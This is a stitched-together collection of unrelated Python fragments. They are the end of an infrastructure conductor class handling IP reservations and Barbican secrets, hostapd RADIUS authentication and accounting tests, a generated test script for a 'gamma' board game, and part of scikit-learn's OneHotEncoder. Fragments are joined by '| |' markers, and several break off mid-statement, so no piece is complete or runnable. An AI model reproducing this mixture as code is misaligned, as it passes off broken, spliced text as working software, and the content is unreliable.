LOG.debug("Addres %s already reserved, continuing." % address_name)
except exception.AddressNotFoundByName:
LOG.debug("Reserving address for %s." % address_name)
self._allocate_pool_address(None, network.pool_uuid,
address_name)
self._generate_dnsmasq_hosts_file()
def reserve_ip_for_cinder(self, context):
"""
Reserve ip address for Cinder's services
:param context: request context.
"""
lvm_backend = StorageBackendConfig.has_backend(
self.dbapi,
constants.CINDER_BACKEND_LVM
)
if not lvm_backend:
# Cinder's IP address is only valid if LVM backend exists
return
network = self.dbapi.network_get_by_type(constants.NETWORK_TYPE_MGMT)
network_type = constants.NETWORK_TYPE_MGMT
# Reserve new ip address, if not present
try:
self.dbapi.address_get_by_name(
self._get_cinder_address_name(network_type)
)
except exception.NotFound:
self._allocate_pool_address(None, network.pool_uuid,
self._get_cinder_address_name(network_type))
self._generate_dnsmasq_hosts_file()
def host_load_matches_sw_version(self, host):
"""
Checks if the host is running the same load as the active controller
:param host: a host object
:return: true if host target load matches active sw_version
"""
host_upgrade = self.dbapi.host_upgrade_get_by_host(host.id)
target_load = self.dbapi.load_get(host_upgrade.target_load)
return target_load.software_version == tsc.SW_VERSION
def create_barbican_secret(self, context, name, payload):
"""Calls Barbican API to create a secret
:param context: request context.
:param name: secret name
:param payload: secret payload
"""
self._openstack.create_barbican_secret(context=context,
name=name, payload=payload)
def delete_barbican_secret(self, context, name):
"""Calls Barbican API to delete a secret
:param context: request context.
:param name: secret name
"""
self._openstack.delete_barbican_secret(context=context, name=name)
| |
# RADIUS tests
# Copyright (c) 2013-2016, <NAME> <<EMAIL>>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import subprocess
import threading
import time
import hostapd
from utils import HwsimSkip, require_under_vm, skip_with_fips, fail_test
from test_ap_hs20 import build_dhcp_ack
from test_ap_ft import ft_params1
def connect(dev, ssid, wait_connect=True):
dev.connect(ssid, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="<EMAIL>",
password_hex="<PASSWORD>",
wait_connect=wait_connect)
def test_radius_auth_unreachable(dev, apdev):
"""RADIUS Authentication server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_port'] = "18139"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
if int(mib["radiusAuthClientPendingRequests"]) < 1:
raise Exception("Missing pending RADIUS Authentication request")
def test_radius_auth_unreachable2(dev, apdev):
"""RADIUS Authentication server unreachable (2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.17"
params['auth_server_port'] = "18139"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAuthClientAccessRequests" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAuthClientAccessRetransmissions"]) < 1:
raise Exception("Missing RADIUS Authentication retransmission")
def test_radius_auth_unreachable3(dev, apdev):
"""RADIUS Authentication server initially unreachable, but then available"""
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['auth_server_addr'] = "192.168.213.18"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('auth_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
def test_radius_acct_unreachable(dev, apdev):
"""RADIUS Accounting server unreachable"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 2:
raise Exception("Missing RADIUS Accounting retransmissions")
if int(mib["radiusAccClientPendingRequests"]) < 2:
raise Exception("Missing pending RADIUS Accounting requests")
def test_radius_acct_unreachable2(dev, apdev):
"""RADIUS Accounting server unreachable(2)"""
subprocess.call(['ip', 'ro', 'replace', '192.168.213.17', 'dev', 'lo'])
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.17"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
subprocess.call(['ip', 'ro', 'del', '192.168.213.17', 'dev', 'lo'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS retries")
time.sleep(4)
mib = hapd.get_mib()
if "radiusAccClientRetransmissions" not in mib:
raise Exception("Missing MIB fields")
if int(mib["radiusAccClientRetransmissions"]) < 1 and int(mib["radiusAccClientPendingRequests"]) < 1:
raise Exception("Missing pending or retransmitted RADIUS Accounting requests")
def test_radius_acct_unreachable3(dev, apdev):
"""RADIUS Accounting server initially unreachable, but then available"""
require_under_vm()
subprocess.call(['ip', 'ro', 'replace', 'blackhole', '192.168.213.18'])
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "192.168.213.18"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-acct")
subprocess.call(['ip', 'ro', 'del', 'blackhole', '192.168.213.18'])
time.sleep(0.1)
dev[0].request("DISCONNECT")
hapd.set('acct_server_addr_replace', '127.0.0.1')
dev[0].request("RECONNECT")
dev[0].wait_connected()
time.sleep(1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalResponses'])
req_e = int(as_mib_end['radiusAccServTotalResponses'])
if req_e <= req_s:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_unreachable4(dev, apdev):
"""RADIUS Accounting server unreachable and multiple STAs"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
for i in range(20):
connect(dev[0], "radius-acct")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_radius_acct(dev, apdev):
"""RADIUS Accounting"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_auth_req_attr'] = [ "126:s:Operator", "77:s:testing" ]
params['radius_acct_req_attr'] = [ "126:s:Operator", "77:s:testing" ]
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="<PASSWORD>")
dev[2].connect("radius-acct", key_mgmt="WPA-EAP",
eap="GPSK", identity="gpsk-cui",
password="<PASSWORD>",
scan_freq="2412")
logger.info("Checking for RADIUS counters")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 3:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_non_ascii_ssid(dev, apdev):
"""RADIUS Accounting and non-ASCII SSID"""
params = hostapd.wpa2_eap_params()
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
ssid2 = "740665007374"
params['ssid2'] = ssid2
hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid2=ssid2, key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="<EMAIL>",
password_hex="<PASSWORD>")
def test_radius_acct_pmksa_caching(dev, apdev):
"""RADIUS Accounting with PMKSA caching"""
as_hapd = hostapd.Hostapd("as")
as_mib_start = as_hapd.get_mib(param="radius_server")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-acct")
dev[1].connect("radius-acct", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="test-class",
password_hex="<PASSWORD>")
for d in [ dev[0], dev[1] ]:
d.request("REASSOCIATE")
d.wait_connected(timeout=15, error="Reassociation timed out")
count = 0
while True:
mib = hapd.get_mib()
if int(mib['radiusAccClientResponses']) >= 4:
break
time.sleep(0.1)
count += 1
if count > 10:
raise Exception("Did not receive Accounting-Response packets")
if int(mib['radiusAccClientRetransmissions']) > 0:
raise Exception("Unexpected Accounting-Request retransmission")
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
acc_s = int(as_mib_start['radiusAuthServAccessAccepts'])
acc_e = int(as_mib_end['radiusAuthServAccessAccepts'])
if acc_e < acc_s + 1:
raise Exception("Unexpected RADIUS server auth MIB value")
def test_radius_acct_interim(dev, apdev):
"""RADIUS Accounting interim update"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hostapd.add_ap(apdev[0], params)
hapd = hostapd.Hostapd(apdev[0]['ifname'])
connect(dev[0], "radius-acct")
logger.info("Checking for RADIUS counters")
as_mib_start = as_hapd.get_mib(param="radius_server")
time.sleep(3.1)
as_mib_end = as_hapd.get_mib(param="radius_server")
req_s = int(as_mib_start['radiusAccServTotalRequests'])
req_e = int(as_mib_end['radiusAccServTotalRequests'])
if req_e < req_s + 3:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable(dev, apdev):
"""RADIUS Accounting interim update with unreachable server"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(3.1)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_interim_unreachable2(dev, apdev):
"""RADIUS Accounting interim update with unreachable server (retry)"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "18139"
params['acct_server_shared_secret'] = "radius"
# Use long enough interim update interval to allow RADIUS retransmission
# case (3 seconds) to trigger first.
params['radius_acct_interim_interval'] = "4"
hapd = hostapd.add_ap(apdev[0], params)
start = hapd.get_mib()
connect(dev[0], "radius-acct")
logger.info("Waiting for interium accounting updates")
time.sleep(7.5)
end = hapd.get_mib()
req_s = int(start['radiusAccClientTimeouts'])
req_e = int(end['radiusAccClientTimeouts'])
if req_e < req_s + 2:
raise Exception("Unexpected RADIUS server acct MIB value")
def test_radius_acct_ipaddr(dev, apdev):
"""RADIUS Accounting and Framed-IP-Address"""
try:
_test_radius_acct_ipaddr(dev, apdev)
finally:
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def _test_radius_acct_ipaddr(dev, apdev):
params = { "ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'proxy_arp': '1',
'ap_isolate': '1',
'bridge': 'ap-br0' }
hapd = hostapd.add_ap(apdev[0], params, no_enable=True)
try:
hapd.enable()
except:
# For now, do not report failures due to missing kernel support
raise HwsimSkip("Could not start hostapd - assume proxyarp not supported in kernel version")
bssid = apdev[0]['bssid']
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
addr0 = dev[0].own_addr()
pkt = build_dhcp_ack(dst_ll="ff:ff:ff:ff:ff:ff", src_ll=bssid,
ip_src="192.168.1.1", ip_dst="255.255.255.255",
yiaddr="192.168.1.123", chaddr=addr0)
if "OK" not in hapd.request("DATA_TEST_FRAME ifname=ap-br0 " + binascii.hexlify(pkt)):
raise Exception("DATA_TEST_FRAME failed")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
def send_and_check_reply(srv, req, code, error_cause=0):
reply = srv.SendPacket(req)
logger.debug("RADIUS response from hostapd")
for i in reply.keys():
logger.debug("%s: %s" % (i, reply[i]))
if reply.code != code:
raise Exception("Unexpected response code")
if error_cause:
if 'Error-Cause' not in reply:
raise Exception("Missing Error-Cause")
if reply['Error-Cause'][0] != error_cause:
raise Exception("Unexpected Error-Cause: {}".format(reply['Error-Cause']))
def test_radius_acct_psk(dev, apdev):
"""RADIUS Accounting - PSK"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="<PASSWORD>")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", psk="12345678", scan_freq="2412")
def test_radius_acct_psk_sha256(dev, apdev):
"""RADIUS Accounting - PSK SHA256"""
as_hapd = hostapd.Hostapd("as")
params = hostapd.wpa2_params(ssid="radius-acct", passphrase="<PASSWORD>")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
def test_radius_acct_ft_psk(dev, apdev):
"""RADIUS Accounting - FT-PSK"""
as_hapd = hostapd.Hostapd("as")
params = ft_params1(ssid="radius-acct", passphrase="<PASSWORD>")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct", key_mgmt="FT-PSK",
psk="12345678", scan_freq="2412")
def test_radius_acct_ieee8021x(dev, apdev):
"""RADIUS Accounting - IEEE 802.1X"""
skip_with_fips(dev[0])
as_hapd = hostapd.Hostapd("as")
params = hostapd.radius_params()
params["ssid"] = "radius-acct-1x"
params["ieee8021x"] = "1"
params["wep_key_len_broadcast"] = "13"
params["wep_key_len_unicast"] = "13"
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
hapd = | |
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 148810660
"""
"""
random actions, total chaos
"""
board = gamma_new(7, 8, 5, 5)
assert board is not None
assert gamma_move(board, 2, 1, 4) == 1
assert gamma_move(board, 2, 6, 5) == 1
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 1, 0) == 1
assert gamma_move(board, 3, 0, 1) == 1
assert gamma_move(board, 4, 2, 6) == 1
assert gamma_free_fields(board, 4) == 51
assert gamma_move(board, 5, 4, 4) == 1
assert gamma_move(board, 5, 3, 1) == 1
assert gamma_move(board, 1, 3, 6) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 3, 5, 7) == 1
assert gamma_busy_fields(board, 3) == 3
assert gamma_move(board, 4, 5, 1) == 1
assert gamma_move(board, 4, 0, 0) == 1
assert gamma_move(board, 5, 2, 3) == 1
assert gamma_move(board, 5, 3, 0) == 1
assert gamma_move(board, 1, 5, 4) == 1
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 2, 0, 0) == 0
assert gamma_free_fields(board, 2) == 42
assert gamma_move(board, 3, 2, 1) == 1
assert gamma_move(board, 3, 1, 2) == 1
assert gamma_move(board, 4, 5, 5) == 1
assert gamma_move(board, 4, 6, 6) == 1
assert gamma_move(board, 1, 1, 6) == 1
assert gamma_busy_fields(board, 1) == 3
assert gamma_free_fields(board, 2) == 37
assert gamma_move(board, 3, 2, 0) == 1
assert gamma_move(board, 4, 5, 3) == 0
assert gamma_move(board, 4, 0, 1) == 0
board331349876 = gamma_board(board)
assert board331349876 is not None
assert board331349876 == (".....3.\n"
".141..4\n"
".....42\n"
".2..51.\n"
"..5....\n"
".3.....\n"
"3.35.4.\n"
"4335...\n")
del board331349876
board331349876 = None
assert gamma_move(board, 5, 4, 1) == 1
assert gamma_golden_possible(board, 5) == 1
assert gamma_golden_move(board, 5, 0, 2) == 0
assert gamma_move(board, 1, 3, 0) == 0
assert gamma_move(board, 1, 4, 0) == 1
assert gamma_move(board, 2, 1, 6) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_free_fields(board, 3) == 34
assert gamma_move(board, 5, 6, 0) == 1
assert gamma_move(board, 1, 7, 4) == 0
assert gamma_move(board, 1, 0, 5) == 1
assert gamma_golden_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 3, 7) == 1
assert gamma_move(board, 3, 1, 5) == 1
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_busy_fields(board, 3) == 7
assert gamma_free_fields(board, 3) == 8
assert gamma_move(board, 4, 2, 5) == 1
assert gamma_move(board, 4, 4, 2) == 0
assert gamma_golden_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 6, 5) == 0
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 2, 3, 0) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 1, 7) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 5, 6, 6) == 0
assert gamma_free_fields(board, 5) == 29
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 2, 0, 7) == 1
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 4, 5, 3) == 0
assert gamma_move(board, 4, 6, 1) == 1
assert gamma_busy_fields(board, 4) == 7
assert gamma_free_fields(board, 4) == 9
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 1, 4, 6) == 1
assert gamma_move(board, 1, 4, 7) == 1
assert gamma_move(board, 2, 1, 7) == 1
assert gamma_move(board, 2, 3, 1) == 0
assert gamma_move(board, 3, 4, 3) == 0
assert gamma_move(board, 4, 3, 7) == 0
assert gamma_move(board, 4, 6, 6) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 4, 0) == 0
assert gamma_move(board, 5, 5, 2) == 1
assert gamma_move(board, 1, 2, 2) == 0
assert gamma_move(board, 2, 0, 5) == 0
assert gamma_move(board, 2, 2, 4) == 1
assert gamma_busy_fields(board, 2) == 6
assert gamma_golden_move(board, 2, 1, 6) == 1
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 7, 2) == 0
assert gamma_move(board, 5, 5, 4) == 0
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 1, 2, 3) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_free_fields(board, 1) == 22
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 4, 0, 4) == 0
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 1, 6, 1) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 2, 0, 7) == 0
assert gamma_free_fields(board, 2) == 22
assert gamma_move(board, 3, 5, 3) == 0
assert gamma_move(board, 3, 3, 5) == 0
assert gamma_move(board, 4, 5, 0) == 1
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 2, 6) == 0
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 2, 4, 5) == 1
assert gamma_golden_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 4, 0) == 0
assert gamma_move(board, 4, 0, 0) == 0
board898449385 = gamma_board(board)
assert board898449385 is not None
assert board898449385 == ("22.213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..5....\n"
".3...5.\n"
"3.35544\n"
"4335145\n")
del board898449385
board898449385 = None
assert gamma_move(board, 5, 4, 5) == 0
assert gamma_move(board, 1, 3, 3) == 1
assert gamma_free_fields(board, 1) == 9
board714401105 = gamma_board(board)
assert board714401105 is not None
assert board714401105 == ("22.213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..51...\n"
".3...5.\n"
"3.35544\n"
"4335145\n")
del board714401105
board714401105 = None
assert gamma_move(board, 2, 2, 7) == 1
assert gamma_move(board, 3, 2, 2) == 1
assert gamma_move(board, 4, 3, 4) == 0
assert gamma_move(board, 4, 3, 0) == 0
assert gamma_move(board, 5, 3, 0) == 0
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 1, 6, 0) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_move(board, 2, 6, 5) == 0
assert gamma_busy_fields(board, 2) == 9
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 3, 0) == 0
assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 3, 0) == 0
assert gamma_move(board, 5, 4, 3) == 1
assert gamma_move(board, 5, 5, 7) == 0
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 7, 6) == 0
assert gamma_move(board, 1, 0, 7) == 0
assert gamma_move(board, 2, 7, 6) == 0
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 3, 5, 3) == 1
assert gamma_busy_fields(board, 3) == 9
assert gamma_move(board, 4, 1, 1) == 0
assert gamma_move(board, 4, 1, 4) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 5, 4, 6) == 0
assert gamma_free_fields(board, 5) == 5
assert gamma_golden_possible(board, 5) == 1
assert gamma_golden_move(board, 5, 5, 2) == 0
board392075440 = gamma_board(board)
assert board392075440 is not None
assert board392075440 == ("222213.\n"
".2411.4\n"
"134.242\n"
".22.51.\n"
"..5153.\n"
".33..5.\n"
"3.35544\n"
"4335145\n")
del board392075440
board392075440 = None
assert gamma_move(board, 1, 5, 1) == 0
assert gamma_move(board, 2, 7, 6) == 0
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_golden_move(board, 5, 1, 6) == 0
assert gamma_move(board, 1, 5, 3) == 0
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 0) == 0
assert gamma_move(board, 3, 6, 3) == 1
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 4, 2, 3) == 0
assert gamma_golden_move(board, 4, 3, 6) == 1
assert gamma_move(board, 5, 3, 1) == 0
assert gamma_move(board, 5, 1, 6) == 0
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 1, 6, 4) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_busy_fields(board, 2) == 10
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 3, 1) == 0
assert gamma_move(board, 5, 7, 6) == 0
assert gamma_busy_fields(board, 5) == 8
assert gamma_golden_possible(board, 5) == 1
assert gamma_move(board, 1, 2, 7) == 0
assert gamma_move(board, 1, 0, 6) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 2, 6) == 0
assert gamma_move(board, 2, 3, 4) == 1
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 3, 7) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_golden_possible(board, 3) == 1
board687132456 = gamma_board(board)
assert board687132456 is not None
assert board687132456 == ("222213.\n"
"12441.4\n"
"134.242\n"
".222511\n"
"2.51533\n"
".33..5.\n"
"3.35544\n"
"4335145\n")
del board687132456
board687132456 = None
assert gamma_move(board, | |
----------
n_values : 'auto', int or array of int
Number of values per feature.
'auto' : determine value range from training data.
int : maximum value for all features.
array : maximum value per feature.
dtype : number type, default=np.float
Desired dtype of output.
Attributes
----------
`active_features_` : array
Indices for active features, meaning values that actually occur in the
training set. Only available when n_values is ``'auto'``.
`feature_indices_` : array of shape (n_features,)
Indices to feature ranges. Feature ``i`` in the original data is mapped
to features ``feature_indices_[i]`` to ``feature_indices_[i+1]``
(and potentially masked by `active_features_` afterwards)
`n_values_` : array of shape (n_features,)
Maximum number of values per feature.
Examples
--------
Given a dataset with three features and two samples, we let the encoder
find the maximum value per feature and transform the data to a binary
one-hot encoding.
>>> from sklearn.preprocessing import OneHotEncoder
>>> enc = OneHotEncoder()
>>> enc.fit([[0, 0, 3], [1, 1, 0], [0, 2, 1], [1, 0, 2]])
OneHotEncoder(dtype=<type 'float'>, n_values='auto')
>>> enc.n_values_
array([2, 3, 4])
>>> enc.feature_indices_
array([0, 2, 5, 9])
>>> enc.transform([[0, 1, 1]]).toarray()
array([[ 1., 0., 0., 1., 0., 0., 1., 0., 0.]])
See also
--------
LabelEncoder : performs a one-hot encoding on arbitrary class labels.
sklearn.feature_extraction.DictVectorizer : performs a one-hot encoding of
dictionary items (also handles string-valued features).
"""
def __init__(self, n_values="auto", dtype=np.float):
self.n_values = n_values
self.dtype = dtype
def fit(self, X, y=None):
"""Fit OneHotEncoder to X.
Parameters
----------
X : array-like, shape=(n_samples, n_feature)
Input array of type int.
Returns
-------
self
"""
self.fit_transform(X)
return self
def fit_transform(self, X, y=None):
"""Fit OneHotEncoder to X, then transform X.
Equivalent to self.fit(X).transform(X), but more convenient and more
efficient. See fit for the parameters, transform for the return value.
"""
X = check_arrays(X, sparse_format='dense', dtype=np.int)[0]
if np.any(X < 0):
raise ValueError("X needs to contain only non-negative integers.")
n_samples, n_features = X.shape
if self.n_values == 'auto':
n_values = np.max(X, axis=0) + 1
elif isinstance(self.n_values, numbers.Integral):
n_values = np.empty(n_features, dtype=np.int)
n_values.fill(self.n_values)
else:
try:
n_values = np.asarray(self.n_values, dtype=int)
except (ValueError, TypeError):
raise TypeError("Wrong type for parameter `n_values`."
" Expected 'auto', int or array of ints, got %r"
% type(X))
if n_values.ndim < 1 or n_values.shape[0] != X.shape[1]:
raise ValueError("Shape mismatch: if n_values is "
"an array, it has to be of shape (n_features,).")
self.n_values_ = n_values
n_values = np.hstack([[0], n_values])
indices = np.cumsum(n_values)
self.feature_indices_ = indices
column_indices = (X + indices[:-1]).ravel()
row_indices = np.repeat(np.arange(n_samples, dtype=np.int32),
n_features)
data = np.ones(n_samples * n_features)
out = sp.coo_matrix((data, (row_indices, column_indices)),
shape=(n_samples, indices[-1]), dtype=self.dtype).tocsr()
if self.n_values == 'auto':
mask = np.array(out.sum(axis=0)).ravel() != 0
active_features = np.where(mask)[0]
out = out[:, active_features]
self.active_features_ = active_features
return out
def transform(self, X):
